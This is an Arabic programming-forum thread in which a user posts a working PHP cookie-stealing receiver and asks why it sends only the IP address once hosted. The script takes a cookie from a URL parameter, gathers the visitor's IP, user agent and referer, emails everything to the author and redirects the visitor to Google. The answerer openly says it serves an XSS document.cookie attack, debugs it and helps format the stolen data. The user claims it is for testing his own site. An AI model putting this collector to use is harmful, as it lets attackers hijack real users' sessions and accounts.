_Mehdi نشر 23 سبتمبر 2016 عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة فيظهر فقط الIP . مالسبب؟ $Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie"; انشر على الشّبكات الاجتماعية رابط هذه المساهمة
1 KSA brg نشر 24 سبتمبر 2016 اعدادات جهازك تختلف عن الاستضافة افصل بين النص والكود كالتالي $Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| METHOD: ".$rqst_method. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:". $cookie; انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 _Mehdi نشر 24 سبتمبر 2016 (مُعدّل) اخي عندما اضعها بهذه الصورة يكون الناتج كالتالي IP:37.239.128.15| PORT: | HOST:| Agent: | METHOD: | REF: | DATE{ : } | COOKIE: ولايطبع كل القيم تمّ تعديل 24 سبتمبر 2016 بواسطة java انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 KSA brg نشر 24 سبتمبر 2016 ضع كود الصفحة اللتي لديك وساقوم بالتعديل عليها بما يلزم 1 شخص أعجب بهذا انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 _Mehdi نشر 24 سبتمبر 2016 <?php $YourMail = "x@hotmail.com"; if(isset($_GET['index'])){ $cookie = $_GET['index']; $path = getenv('PATH'); $date=date ("l dS of F Y h:i:s A"); $rem_port = $_SERVER['REMOTE_PORT']; $rem_host = $_SERVER['REMOTE_HOST']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $referer = $_SERVER['HTTP_REFERER']; $redirect = "https://www.google.com"; Echo '<script>document. Location="'. $redirect.'"</script>'; } else print ' <body bgcolor="000000"> <center> <b><font color="red">404</font></b><br></center>'; if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); } else { $ip=getenv('REMOTE_ADDR'); } $Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:". $cookie; $Send = mail ($YourMail,"cookie",$Msg); If ($Send) { if ($redirect <> ""){ header("location:".$redirect); } } ?> علما ان هذا الكود اعمل عليه في موقع من تصميمي لاختبار ثغرة وليس استخدام خبيث ضد المواقع انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 KSA brg نشر 24 سبتمبر 2016 كودك صحيح المشكله اللي تواجهك انت لافتحت الرابط file.php يرسل فقط الايبي على الايميل بسبب الشرط if(isset($_GET['index'] لو تفتح الرابط مثل كذا file.php?index=1 بيرسل كامل المعلومات صحيحه 1 شخص أعجب بهذا انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 _Mehdi نشر 24 سبتمبر 2016 (مُعدّل) انا واضع هذا الكود على استضافة واضع كود جافاسكربت في الموقعي لكي يرسل قيمة الكوكيز لهذا الكود وعندما اضع هذا المتغيرات بهذه الصيغة يرسل المعلومات كاملة ولكن تكون بشكل مكدس بلافواضل انا لاابغي غير ترتيب المعلومات $Msg=$cookie.$path.$date.$ip.$rem_port.$rem_host.$user_agent.$referer; احتاج ان تكون مرتبه كما هي في هذا http://www.go4expert.com/articles/stealing-cookie-xss-t17066/ وشكراجزيلا لك على المساعدة تمّ تعديل 24 سبتمبر 2016 بواسطة java انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 KSA brg نشر 24 سبتمبر 2016 عزيزي انا من شفت الكود عرفت انه لاستغلال ثغرة Xss ولذلك تم استخدام المتغير index لكي ترسل القيمة ويتحقق الشرط بحيث يرسل كود جافا سكربت عباره عن document.cookie لكن لو اردت المعلومات تاتي تحت بعض تستخدم التنسيق html مثلا <br /> كل وحده بسطر جديد $Msg="IP:".$ip."<br />| PORT: ".$rem_port. "<br />| HOST:". $rem_host. "<br />| Agent: ".$user_agent. "<br />| REF: ".$referer."<br />| DATE{ : }". $date." <br />| COOKIE:". $cookie; 1 شخص أعجب بهذا انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 _Mehdi نشر 24 سبتمبر 2016 عذرا اخي لم اقصد انك لم تفهم الموضوع ولكن اردت التوضيح اكثر لاني لم افهم اجابتك السابقة اي فايل تقصد بالضبط هذه الاجابة بتاريخ 44 دقائق مضت قال KSA brg: و تفتح الرابط مثل كذا file.php?index= وايضا عندما اضع <br /> ايضا لايتم تنفيذه بشكل صحيح شكرا جزيلا لك وعذرا على الاطالة انشر على الشّبكات الاجتماعية رابط هذه المساهمة
0 KSA brg نشر 24 سبتمبر 2016 (مُعدّل) انت حفظت الملف باسم معين فرضا انك حفظته باسم file.php لاجيت تفتحه بالمتصفح بيكون كذا http://localhost/file.php?index=cookei طبعا هو الكود مصمم لسحب الكوكيز يستقبل عن طريق المتغير لكن للتجربه لنجاح الكود تضع المتغير اندكس بعد اسم الملف تمّ تعديل 24 سبتمبر 2016 بواسطة KSA brg انشر على الشّبكات الاجتماعية رابط هذه المساهمة
عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة فيظهر فقط الIP . مالسبب؟
$Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie";
انشر على الشّبكات الاجتماعية
رابط هذه المساهمة